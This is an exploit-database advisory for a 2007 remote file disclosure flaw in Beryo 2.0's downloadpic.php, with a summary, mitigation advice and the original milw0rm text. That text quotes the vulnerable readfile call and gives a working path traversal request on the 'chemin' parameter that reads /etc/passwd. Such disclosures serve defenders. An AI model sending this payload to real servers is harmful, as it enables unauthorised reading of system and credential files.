header-logo
Suggest Exploit
vendor:
Beryo
by:
GolD_M
5.5
CVSS
MEDIUM
Remote File Disclosure
22
CWE
Product Name: Beryo
Affected Version From: Beryo 2.0
Affected Version To: Beryo 2.0
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Metasploit:
Other Scripts:
Platforms Tested: Not available
2007

Beryo 2.0(downloadpic.php chemin)Remote File Disclosure Vulnerability

The Beryo 2.0 version contains a vulnerability that allows remote attackers to disclose files from the server. By manipulating the 'chemin' parameter in the 'downloadpic.php' script, an attacker can traverse the directory structure and access sensitive files such as the password file ('/etc/passwd'). The vulnerability can be exploited by sending a crafted request to the server with the appropriate path traversal sequence in the parameter value.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Beryo or apply any available security patches provided by the vendor. Additionally, it is advised to restrict access to sensitive files and directories on the server to prevent unauthorized disclosure.
Source

Exploit-DB raw data:

# Beryo 2.0(downloadpic.php chemin)Remote File Disclosure Vulnerability
# D.Script: http://www.xrousse.org/shared/beryo-2.0.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: readfile("$chemin");
# Exploit:[Path_Beryo]/downloadpic.php?chemin=../../../../../../etc/passwd

# milw0rm.com [2007-04-06]

Navigation

Suggest Exploit

Services By CQR